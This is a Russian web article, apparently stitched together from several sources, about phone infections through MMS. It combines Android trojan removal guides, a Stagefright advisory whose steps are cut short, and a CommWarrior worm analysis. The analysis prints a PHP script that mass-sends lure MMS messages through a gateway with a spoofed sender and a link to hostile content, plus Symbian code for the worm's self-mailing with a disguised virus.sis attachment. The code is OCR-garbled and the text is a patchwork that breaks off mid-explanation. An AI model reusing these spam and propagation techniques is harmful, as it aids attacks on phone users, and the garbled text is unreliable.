Заражение телефона вирусами из MMS-собщений. Приложение mms послание

24.12.2023 Фото

Я думаю, что вы слышали о недавно обнаруженной критической уязвимости Android, которой по оценкам специалистов компании Zimperium, подвержено около 950 миллионов устройств. Эти же разработчики на днях выпустили приложение, которое позволяет проверить Android на наличие данной уязвимости и дали совет как обезопасить себя от злоумышленников.

Специалисты Zimperium недавно обнаружили уязвимость в Android при помощи которой злоумышленник может получить полный контроль над вашим устройством, просто прислав вам специальное MMS-сообщение. Для этого ему достаточно знать всего лишь ваш мобильный номер.

Другие интересные статьи на нашем сайте:

Созданное Zimperium приложение называется Stagefright Detector App и оно бесплатно доступно в Google Play. Суть его работы заключается в том, что оно сканирует ваше устройство на наличие уязвимости в библиотеке Stagefright.

На самом деле данное приложение создано, так сказать, «на будущее». Сейчас 95 процентов устройств на Android подвержены данной уязвимости и практически точно можно сказать, что ваш аппарат – не исключение. Stagefright Detector App понадобится через некоторое время, когда производители исправят эту проблему и вы сможете убедится в безопасности вашего гаджета, запустив проверку в приложении.

Вряд ли конечно компании всерьез займутся исправлением этой уязвимости и пофиксят её на устаревших устройствах, но в ближайших обновлениях её уже может не быть. То есть уязвимость будет устранена только на относительно новых смартфонах и планшетах.

Что советуют специалисты Zimperium?

1. Откройте приложение «Сообщения»;

2. Перейдите в настройки;

3. Там найдите раздел «Настройки MMS»;

У вас путь к этой настройке, да и само название опции («Автозагрузка MMS») могут немного отличатся, но я думаю, что вы легко и сами разберетесь.

Очень многие пользователи подхватили на своих Андроид устройствах вирус-приложение SMS/MMS New, которое вызывает неизвестные уведомления, может отправлять платные сообщения, отслеживать личные данные и звонки. Помимо всего этого некоторые пользователи получают сообщение о сбое стандартной опции – “В приложении SMS/MMS произошла ошибка” . В нашей небольшой статье мы собрали все самые полезные и действенные решения, которые помогут удалить этот вирус из телефона.

Вирусные СМС сообщения

Как удаляются вирусы

Вирусы, ориентированные на захват функции отправки сообщений в Андроиде, распространяются уже давно. Так, до сих пор через данные с Авито распространяется зловред ММС-центр . Удаляется такой вирус через запуск безопасного режима в телефоне, после проходите в Настройки – функция Безопасность – опция Администрирование – Администраторы устройств, где снимается галочка с программы. После следует стандартное удаление через Диспетчер.

Сейчас же активничает троянское приложение SMS/MMS New . Источников распространения очень много, в основном это популярный софт и рассылка сообщений (со ссылками типа http://mms-new.ru/id169). Удаляется этот троян подобно ММС-центру:

  1. Следует в безопасном режиме выполнить вышеописанные действия и проверить в Администраторы устройств вирус New и если есть снять галочку.
  2. После запустите сканирование мобильным антивирусом Dr.Web Light . Применить можно и другие сканеры, но я рекомендую именно доктора – базы уж очень актуальные у него.
  3. Далее удалите все предустановленные программы и загрузки. Также сделайте сброс стандартных настроек приложений СМС/ММС в телефоне.

В приложении SMS/MMS произошла ошибка – как исправить

Такие вирусы после себя могут оставить сбой в системном приложении. Чаще всего такой сбой вызван сбитыми настройками. После попытки отправить сообщение, пользователи получают уведомление, что в приложении смс/ммс произошла ошибка.


Данный сбой может возникать и не по вине вирусов, а после определенных апдейтов, либо вследствие кривых прошивок. В любом случае, решения должны помочь.

Использование популярного особенно среди молодежи MMS-сервиса таит в себе немало опасностей, о которых большинство пользователей, к сожалению, не подозревает.

В один прекрасный день вы можете получить MMS-сообщение или от вашего знакомого, или с неизвестного вам телефонного номера, или даже якобы от вашего сотового оператора. Откроете его и заразите свой телефон вирусом. В тексте зараженных MMS-сообщений может содержаться информация о том, что в приложении к нему находится бесплатная игра от вашего сотового оператора, новый рингтон от друга или архив с фотографиями от вашей дочери. Все это будет убеждать вас в необходимости скачать, установить или сохранить на карте памяти то, что было прислано в сообщении. Иногда в MMS-сообщении может находиться ссылка на какое-либо приложение или какой-то архив в Интернете.

MMS-сообщение, которое вы откроете на своем мобильном телефоне, не только может заразить ваш аппарат вирусом, но и разослать зараженные сообщения на номера телефонов из вашей записной книги.

Опаснее всего то, что когда ваш телефон будет заражен подобным образом, он сам станет атаковать абонентов мобильной связи из вашего списка контактов. То есть ваши друзья, знакомые или коллеги будут получать от вас MMS-сообщения с вирусом. В свою очередь пораженные сотовые телефоны ваших коллег начнут атаковать телефонные номера из своих адресных книг. Подобный процесс будет иметь лавинный характер и, в конечном итоге, может привести к массовым заражениям мобильных устройств.

В настоящее время подобные сценарии не очень распространены из-за того, что популярность MMS-сервисов недостаточно высока, а мобильный Интернет стоит дорого. Далеко не каждый пользователь станет закачивать себе на сотовый телефон прикрепленную программу или архив, предпочитая сделать это дома на стационарном компьютере, где это будет более экономично.

Тем не менее, в условиях падения цен на мобильный Интернет, появления безлимитных тарифов , популяризации MMS-сервиса, а также при соответствующем развитии вирусных технологий, подобные сценарии в будущем могут стать вполне реальными.

MMS (Multimedia Messaging Service) — это сервис передачи сообщений, который обеспечивает автоматическую мгновенную передачу личных мультимедийных сообщений на телефонный номер или на адрес электронной почты. Эта технология кардинально изменила набор услуг, которыми может пользоваться абонент при передаче сообщений. Однако с появлением новых возможностей появились и новые уязвимости.

Так как технология MMS позволяет передавать вместе с сообщением файл приложения, то этим механизмом тут же воспользовались вирусы для своего распространения. В данный момент уже существует подобный вирус. Он носит название CommWarrior. Вредоносная программа поражает телефоны Nokia серии 60 на базе операционной системы Symbian. примитивны и характерны для его аналогов на компьютере: вредоносный код передается на мобильное устройство в виде входящего MMS-сообщения с вложенным медиа-файлом — картинкой, аудио- или видеозаписью.

Внутри самого сообщения находится текст (всего выявлено 20 различных вариантов), который всячески побуждает абонента сотовой связи открыть вложенный файл. О том, как устроен сам вирус, будет рассказано позже, а пока рассмотрим, как злоумышленник может целенаправленно атаковать интересующий его мобильный телефон с помощью MMS. PHP-скрипт, представленный ниже, осуществляет запрос на отправку MMS-сообщения через коммерческий SMS-шлюз по протоколу http/https.

1 2 $user=»user»;
3 $password=»password»;
4 $api_id=»xxx»;
5 $text=urlencode(«Бесплатная игра от MegaPone, скачай и играй!»);
6 $to=»79035555555″;
7 $from=»MegaPone»;
8 $mms__url=»http://somesmscenter.ru/game.mms»;
9 $ret= file («http://smscenter.com/auth?user=$user&password=$password&apijd=$apijd»);
10 if ($ret ==»OK»){
11 for ($1=0; $i<100; $i++)
12 {
13 $ret= file («http://smscenter.com/sendmsg?to=$to8rtext=$text»);
414 if ($ret == «OK») echo «Success. Message was sent»;
15 }
16 }
17 else echo «Error. Message was not sent»;

Для злоумышленника передача сообщения через SMS-шлюз является предпочтительной тем, что он может указать в качестве отправителя номер, которому доверяет атакуемый, а в поле текста — сообщение, которое может побудить жертву открыть вложение. В параметре $mms_url он устанавливает адрес вредоносного содержимого, расположенного в Интернете. В параметре $from указывается номер абонента, а в поле $text — сам текст.

MMS-сообщения вируса Commwarrior содержат текст, побуждающий открыть сообщение, и файл commw.sis. Расширение прикрепленного файла SIS указывает на то, что файл является исполняемым для платформы Symbian — самой распространенной операционной системы для мобильных устройств в настоящее время.

Последняя версия вируса Commwarrior рассылает жертвам MMS со следующими сообщениями:

Заголовок: 3DNow!
Сообщение: 3DGame from me. It is FREE !

Заголовок: MatrixRemover
Сообщение: Matrix has you. Remove matrix!

Заголовок: Nokia ringtoner
Сообщение: Nokia RingtoneManager for all models.

После того, как содержащий Commwarrior SIS файл будет установлен, выполняемые файлы будут помещены в папку:

\system\apps\CommWarrior\commwarrior.exe
\system\apps\CommWarrior\commrec.mdl

При выполнении commwarrior.exe вирус копируется в папки

\system\updates\commrec.mdl
\system\updates\commwarrior.exe
\system\updates\commw.sis

После создания файла \system\updates\commw.sis вирус приступает к рассылке MMS-сообщений.

Рассмотрим некоторые детали механизма заражения с помощью MMS-сообщений. Приведенные отрывки программного «тела» вируса являются неполными из соображений безопасности, а сам разбираемый код относится лишь к отправке MMS-сообщений и никак не связан с вредоносной нагрузкой вируса.

Итак, сначала вирус создает сессию для работы с центром сообщений. Делается это с помощью следующего оператора.

iSession = CMsvSession::OpenAsyncL(*this);

Полученный идентификатор сессии используется для создания клиента, который будет обращаться к центру сообщений. Такой клиент создается следующим образом.

iMtmReg = CCIientMtmRegistry::NewL(*iSession);

Так как работа с центром сообщений ведется только для отправки MMS-сообщений, то необходимо выполнить преобразование созданного клиента в MMS-клиент.

iMmsMtm =mstatic_cast
(iMtmReg->NewMtmL (KUidMsgTypeMultimedia));

После того, как необходимая предварительная работа выполнена, вирус переходит к созданию самого MMS-сообщения. Для этого необходимо, во-первых, указать, что сообщение создается в каталоге «Черновики» мобильного телефона. Делается это следующим образом.

iMmsMtm->SwitchCurrentEntryL(KMsvDraftEntryld);

Метод SwitchCurrentEntryL, вызываемый с параметром Kmsv-DraftEntryld, показывает, что текущим местом создания как раз выбирается каталог «Drafts», то есть как раз каталог «Черновики». После того, как каталог определен, создается MMS-сообщение с параметрами «по умолчанию». Делается это с помощью следующего вызова:

iMmsMtm->CreateMessageL(iMmsMtm->DefaultServiceL())

Далее надо инициализировать основные поля сообщения MMS. Для этого с помощью макроса _LIT инициализируются основные переменные. В операционной системе Symbian макрос JLIT создает переменные. Таким образом, с его помощью определяются следующие переменные:

LIT(KSamsNumber, «07738123456»);
_LIT(KSamsAlias, «Sam»);
_LIT(KPetesNumber, «07812654321»);
_LIT(KMessageSubject, «Nokia ringtoner»);

Переменные могут носить произвольные имена. В приведенном примере в переменной KSamsNumber хранится номер атакуемого абонента, а в создаваемой переменной KSamsAlias хранится его имя, указанное в записной книжке. В переменную KPetesNumber вписывается номер отправителя, а в созданную переменную KMessageSubject записывается тема сообщения. После того как все переменные сформированы, осуществляется инициализация полей уже созданного MMS-сообщения. Делается это с помощью методов AddAddresseeL и SetSubjectL. Первому методу передается параметр EmsvRecipientTo, который определяет поле отправителя. Параметр EmsvRecipientCc инициализирует поле получателя.

iMmsMtm->AddAddresseeL(EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm->AddAddresseeL(EMsvRecipientCc, KPetesNumber);
iMmsMtm->SetSubjectL(KMessageSubject);

Для этого сначала создается переменная с именем прикрепляемого к сообщению файла. В рассматриваемом случае в MMS отправляется сам вирус. Поэтому в качестве имени файла указывается имя вирусной программы.

LIT(KFileName, «virus.sis»);

После того как переменная инициализирована, создается экземпляр класса TfileName, который описывает прикрепленное послание. С помощью метода Append созданного объекта attachmentFile инициализируются такие данные, как путь к файлу и имя самого файла.

TFileName attachmentFile(KPhoneRootPath);
attachmentFile.Append(KDirPictures);
attachmentFile. Append(KFileName);

После совершения этих действий вирус создает и описывает служебную информацию по типам прикрепленных файлов. Обычно вирус намеренно указывает неверный тип прикрепленного файла (mime-тип), например, JPG, чтобы пользователь не заподозрил атаку при передаче ему файла по MMS. Определяются mime типы с помощью следующего программного кода.

CMsvMimeHeaders* mimeHeaders = CMsvMimeHeaders::NewL();
CleanupStack::PushL(mimeHeaders);
mimeHeaders->
SetSuggestedFilenameL(KFileName);

TBufC8<10>
mimeType(KMimeType);

CMsvAttachment* attalnfo = CMsvAttachment::NewL(CMsvAttachment::EMsvFile);
CleanupStack::PushL(attalnfo);
_UT8(KMimeType, «image/jpeg»);
TBufC8<10> mimeType(KMimeType);

В приведенных выше строках описывается то, что к MMS-сообщению прикреплен только один файл. После того, как все необходимые приготовления выполнены, вызывается метод Create Attachment 2 L и MMS-сообщение создается.

iMmsMtm->CreateAttachment2L(
* store,
attachment,
mimeType,
*mimeHeaders,
attalnfo,
attachld);
CleanupStack::Pop(attalnfo);
CleanupStack::PopAndDestroy(mimeHeaders);

формирование сообщения завершается с помощью следующих программных строк.

store->CommitL();
attachment.Close();
CleanupStack::PopAndDestroy(attachment);
CleanupStack::PopAndDestroy(store);

Само сообщение сохраняется после полной подготовки с помощью метода SaveMessageL().

iMmsMtm->SaveMessageL();

Наконец отправка сообщения осуществляется следующим образом.

Таким образом, вирус является самораспространяющимся. Описывать, как реализуется вредоносная часть вируса, которая пересылает ваши персональные данные с телефона, мы не будем по понятным причинам. Наша цель — предупредить пользователя о существующей опасности, а не научить злоумышленника создавать вирусы.

ЗАЩИТА ОТ АТАКИ

Для того чтобы обезопасить свой сотовый телефон, необходимо быть крайне аккуратным при получении MMS-сообщения. Помните, что прикрепленное к сообщению вложение вполне может оказаться вирусом. Именно поэтому далеко не всегда стоит принимать MMS-сообщения от незнакомых абонентов. Если же сообщение представляет для вас интерес, то стоит обязательно просканировать приложение антивирусным средством на предмет наличия вирусов.

Если вирус все же попал на ваше мобильное устройство, то возможность безболезненно от него избавиться все же существует. Вы можете лично удалить вредоносный файл, если знаете, где его найти. В случае, если вас атаковал неизвестный вирус, то придется потратить много времени, чтобы его обнаружить. При этом необходимо быть аккуратным, чтобы случайно не удалить системные файлы.

Для того чтобы самостоятельно удалить вирус Commwarrior, необходим менеджер файлов с возможностью просмотра системных каталогов. С помощью этого менеджера можно удалить из памяти мобильного телефона вирусную папку \system\apps\commwarrior, с находящимися в ней специальными файлами вируса commwarrior.exe и commrec. mdl. В каталоге \system\updates\commwarrior необходимо удалить ключевые вирусные файлы commwarrior.exe, commrec.mdl и commw.sis. В каталоге \system\recogs удалению подлежит файл commrec.mdl.

Сегодня наша краткая статья расскажет про очень опасное заражение Андроида вирусами MMS Beeline Центр и Теле 2. Вы узнаете насколько опасен этот вирус и как удалить ММС центр.

С начала года на телефонах Андроид стал появляться опасный троян, который действует очень хитро, маскируясь под официальные услуги мобильных операторов, которые к нему не имеют абсолютно никакого отношения.

Пришло СМС - Обмен с доплатой

Способов проникновения этого вируса на Андроид устройство очень много. Но судя по количеству отзывов, лидирует проникновение через СМС: «Предлагаю обмен с доплатой, вот фото». В смс также указана ссылка, пройдя по которой, пользователь скачивает на телефон зараженный файл - MMS Beeline Центр или MMS Tele 2 Центр.

Как пример, пользователь загружает на свой телефон apk файл следующего типа - «photo_b23148121_img_obmen_s_doplatoy.apk», который на проверку является опасным вирусом - Android.BankBot.97.origin!

После установки начинается самое «интересное». Удаляются все смс с телефона, с мобильного счета снимаются деньги, меняются настройки девайса, в следствии чего, вашим телефоном могут управлять удаленно. Вот как один из пользователей столкнулся с такой проблемой:

Это сообщение приходит якобы от Авито, но ничего общего с этим сайтом не имеет. Такой метод используется мошенниками из-за популярности интернет ресурса и большого доверия к нему пользователей. Человек размещает объявление и оставляет свой номер телефона, а злоумышленник использует этот номер и формирует свою базу для рассылки СМС - «Обмен с доплатой».

Как удалить вирус MMS-центр?

Троян прописывается в телефоне очень крепко и маскируется под услуги мобильных операторов. Простой пользователь не всегда вовремя успевает его обнаружить и может потерять деньги на мобильном счету.

Просмотрев много отзывов и предложений по удалению, я выделил лишь один действительно действенный способ. Итак, сделайте все по-пунктам:

  1. Вам нужно загрузить ваш смартфон в безопасном режиме . Как это делается для вашей версии Андроид посмотрите в интернете - информации предостаточно.
  2. Заходим в Настройки .
  3. В списке опций находим Безопасность .
  4. Далее, Администрирование - Администраторы устройств .
  5. Заходим и снимаем галочку с приложения MMS-центр.
  6. Теперь заходим в Диспетчер приложений и в списке находим MMS-центр.
  7. Нажимаем Удалить и Очистить кэш.
  8. Перезагружаем смартфон.

В зависимости от версии, путь может немного отличатся, но с интуицией, я думаю, все в порядке. Также многие советуют проверить телефон мобильными антивирусами, в том числе и Dr. Web. Вот, например, ролик об аналогичном трояне.